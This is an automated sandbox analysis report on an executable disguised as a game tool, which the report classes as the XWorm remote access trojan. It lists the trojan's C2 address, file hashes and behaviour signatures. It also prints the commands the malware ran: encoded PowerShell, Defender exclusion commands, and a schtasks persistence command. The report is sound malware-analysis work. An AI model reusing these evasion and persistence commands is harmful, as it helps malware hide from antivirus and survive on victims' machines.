Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    15-06-2024 08:44

General

  • Target

    Prism Release V1.5.exe

  • Size

    5.1MB

  • MD5

    ac80f970a7ae1c07663abdd11d752d34

  • SHA1

    5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad

  • SHA256

    b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001

  • SHA512

    7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b

  • SSDEEP

    98304:crjAG8empOd+SyaREAaOeaD5lWsjvi+ffzwZZHUzItLqbn82rh:3ppcNJQkjvi+ffzwZZJiR1

Malware Config

Extracted

Family

xworm

C2

91.92.241.69:5555

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Windows Runtime.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe
    "C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1768
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
    • C:\Users\Admin\dllhost.exe
      "C:\Users\Admin\dllhost.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1748
      • C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
        "C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
          "C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:820
    • C:\Users\Admin\Prism Executor.exe
      "C:\Users\Admin\Prism Executor.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
        "C:\Users\Admin\Prism Executor.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:332
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1140
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {564574B8-2846-46D1-A3B6-9AA79E6F5D1E} S-1-5-21-1340930862-1405011213-2821322012-1000:TICCAUTD\Admin:Interactive:[1]
      1⤵
        PID:1272

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\python310.dll
        Filesize

        4.2MB

        MD5

        384349987b60775d6fc3a6d202c3e1bd

        SHA1

        701cb80c55f859ad4a31c53aa744a00d61e467e5

        SHA256

        f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

        SHA512

        6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        7a9d1c19cacd312219e8b3f263b6e98d

        SHA1

        4b5eec3c52faa2ba8e8ff52444fe8b37675f6750

        SHA256

        8858d129f3fe4908517468c7f7e0dba6229d3474df036d53da3f1032765660ad

        SHA512

        b89d523b9ee18c764dd3ca4d4f52897315f46d2384a2548f82352dc1a4c4f2e0eeace7451e337c89a21079ead7144e601d16c7546dddae557c018aa907ff2e06

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        6cc5f2687f2a665534a9c9d2c2c5d571

        SHA1

        57e8376734a36ec45383c559d8e01a2b5be0bec7

        SHA256

        b8bea798f9af6c4e33c329cfbba6836289399112c155de53c69448e442430a70

        SHA512

        ff47f6dba9fe13b36590b0ab0659f13d4f131c9c2060bbc20718ac8323f917a788f5f8eb7e0f23374452f4a1446f82afc5dff2935ef9e88879d08a40e837964f

      • \Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
        Filesize

        38.4MB

        MD5

        473d542fefe26be37736dc09341747bf

        SHA1

        359cadaafa2f5c032cc300a9097467de701a816c

        SHA256

        f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc

        SHA512

        01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16

      • \Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
        Filesize

        3.5MB

        MD5

        58545dc488990ac11872079d119f8284

        SHA1

        dade5c16834d582a5187041697cc5a7c2eae2f88

        SHA256

        6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc

        SHA512

        93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

      • \Users\Admin\AppData\Local\Temp\zohdbc.exe
        Filesize

        32.9MB

        MD5

        32004d8a59efe46298e06798a1a96cb9

        SHA1

        da3c34b6d7d4f692e673e45dacc825b3ef17a2ed

        SHA256

        03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f

        SHA512

        34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

      • \Users\Admin\Prism Executor.exe
        Filesize

        5.0MB

        MD5

        fa819e23d8fee4ea89aaaea55e0b28f5

        SHA1

        18335d4e0d140dcab66c7197c57f669251898ce5

        SHA256

        bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c

        SHA512

        e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

      • \Users\Admin\dllhost.exe
        Filesize

        78KB

        MD5

        4a7f75343aaa5a4d8d18add50ccf3139

        SHA1

        110c62eee6d7deb4aa9d601c942eae43482d2125

        SHA256

        34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e

        SHA512

        1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

      • memory/1784-954-0x000000001B730000-0x000000001BA12000-memory.dmp
        Filesize

        2.9MB

      • memory/1784-955-0x00000000020C0000-0x00000000020C8000-memory.dmp
        Filesize

        32KB

      • memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp
        Filesize

        104KB